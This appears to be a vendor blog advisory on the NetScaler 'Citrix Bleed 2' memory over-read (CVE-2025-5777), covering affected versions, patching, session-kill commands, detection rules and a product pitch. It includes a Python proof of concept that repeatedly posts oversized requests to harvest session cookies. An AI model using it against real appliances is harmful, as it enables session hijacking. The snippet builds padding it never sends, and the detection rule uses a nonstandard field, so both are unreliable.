On June 17, 2025, Citrix released CTX693420 for CVE-2025-5777, an instance of insufficient input validation in NetScaler ADC and NetScaler Gateway that allows unauthenticated attackers to read memory contents from the appliance. The CVSS v3.1 score is 9.3 and the bug is reachable when the appliance is configured as a Gateway (VPN virtual server, ICA proxy, CVPN, RDP proxy) or AAA virtual server. The community immediately nicknamed it Citrix Bleed 2, recognizing the same family as 2023's CVE-2023-4966, which was the foothold for the Boeing, Comcast Xfinity, and ICBC ransomware events. CISA added CVE-2025-5777 to KEV in late June after active exploitation began on June 23, almost two weeks before any public proof-of-concept dropped.
What is the bug?
The login endpoint of the NetScaler Gateway processes a POST request whose login= parameter is consumed by nsppe, the NetScaler packet engine. The engine builds a response that includes an error message string, but the buffer used to format that string is sized based on the request's Content-Length rather than the actual number of bytes parsed. By sending a request with a small parsed login value and a deliberately oversized Content-Length, the appliance reads an additional 128 to 4096 bytes of uninitialized memory beyond the parsed input and includes it in the HTTP response.
That uninitialized memory frequently contains fragments of recent ICA session tokens, AAA cookies, and NetScaler configuration data. By sending the malformed request thousands of times in rapid succession, an attacker accumulates session tokens that are immediately usable to impersonate authenticated users — exactly the same pattern as the original Citrix Bleed in 2023.
The bug class is CWE-126 (buffer over-read), the same class that gave the world Heartbleed in 2014. The fact that NetScaler shipped a Heartbleed-like architecture in 2025 reflects the age of the underlying packet-engine codebase.
How is it exploited?
The exploit is exactly one request, repeated. A simplified Python proof-of-concept:
import requests
target = "https://netscaler.target.example"
session = requests.Session()
# Trigger the over-read by lying about Content-Length
headers = {"Content-Type": "application/x-www-form-urlencoded"}
for i in range(5000):
body = "login=" # short parsed value
over = "X" * 4096 # padding included via lie
headers["Content-Length"] = str(len(body) + 4096)
r = session.post(f"{target}/p/u/doAuthentication.do",
data=body, headers=headers, verify=False)
leaked = r.text # response embeds leaked memory
if "NSC_AAAC=" in leaked:
print("[+] Captured AAA session cookie")
print(leaked)
Observed in-the-wild exploitation began on June 23, 2025 against NetScaler Gateway appliances exposed to the public internet. ReliaQuest and Akamai both reported the same tradecraft: attacker harvests tokens, replays them against the Gateway, lands in a published Citrix Workspace, and uses RDP-over-Citrix to pivot into the internal network. Several confirmed ransomware incidents in summer 2025 — particularly against U.S. logistics and healthcare orgs — were traced back to Citrix Bleed 2 as the initial access vector.
Who is affected?
The advisory lists NetScaler ADC and Gateway versions:
- 14.1 before 14.1-43.56
- 13.1 before 13.1-58.32
- 13.1-FIPS / NDcPP before 13.1-37.235
- 12.1-FIPS before 12.1-55.328
Versions 12.1 and 13.0 are end-of-life and do not receive a fix. Citrix's mandatory guidance for those builds is to upgrade to a supported version immediately. Any appliance configured as a Gateway VPN virtual server, ICA-proxy server, CVPN, RDP proxy, or AAA virtual server is exposed. Pure load-balancing-only appliances are not affected because the vulnerable code path is in the authentication handler.
Critical post-patch step from the Citrix advisory: kill all active ICA and PCoIP sessions after patching, because tokens captured before the patch remain valid until their natural expiration (often eight or more hours).
# On the NetScaler CLI
kill icaconnection -all
kill pcoipConnection -all
kill aaa session -all
Forgetting this step is the single most common reason organizations remain compromised after applying the patch.
What does patching require?
NetScaler patching is a firmware upgrade with a brief HA failover. Beyond the upgrade, organizations must rotate any credentials that may have been captured in leaked memory. This is more nuanced than it sounds: NetScaler holds long-lived AAA bind passwords, RADIUS shared secrets, and LDAP service-account credentials in process memory. If any of those were captured, they enable lateral movement that survives the patch. Citrix's full remediation guidance instructs operators to assume those secrets are exposed and rotate them all.
How do you detect exploitation?
The detection signal is HTTP requests to /p/u/doAuthentication.do (or /cgi/login) with Content-Length headers significantly exceeding the body's login= parameter length. NetScaler logs these in /var/log/ns.log:
06/23/2025:14:11:09 GMT ns SSLVPN Message 1234 0 : "Httplogin :
login=<empty> contentLen=4196 user-agent=python-requests/2.32.3"
The 2023 Citrix Bleed exposure burned the lesson into many NetScaler operators: ingest ns.log into the SIEM, and alert on any authentication-endpoint request whose body length is less than 32 bytes but whose Content-Length is greater than 1024. A sigma rule:
title: NetScaler Bleed-Style Authentication Probe
logsource:
product: netscaler
service: ns-log
detection:
selection:
cs-uri-stem|contains: '/p/u/doAuthentication.do'
cs-bytes: '>1024'
cs-body|less-than: 32
condition: selection
level: high
Also monitor for ICA session establishments from previously unseen source IPs in a short window — token replay shows up as many sessions to many different VDAs from one source.
How Safeguard Helps
Safeguard's appliance inventory maps every NetScaler ADC and Gateway against Citrix CTX advisories and CISA KEV. When CVE-2025-5777 dropped, customers received exact firmware-build-level findings on the same day, with reachability scoring distinguishing internet-facing Gateways from internal-only ADC load balancers. Griffin AI correlates the active KEV exploitation timeline (in-the-wild from June 23) with each customer's specific build to set patching priority. Post-patch, Safeguard's session-rotation runbook automates the kill aaa session step plus enumerates downstream credential rotations (RADIUS, LDAP bind, SAML signing keys), turning the multi-step Citrix recovery procedure into a single workflow. For continuous coverage, policy gates block any new NetScaler image deployment below the 14.1-43.56 baseline.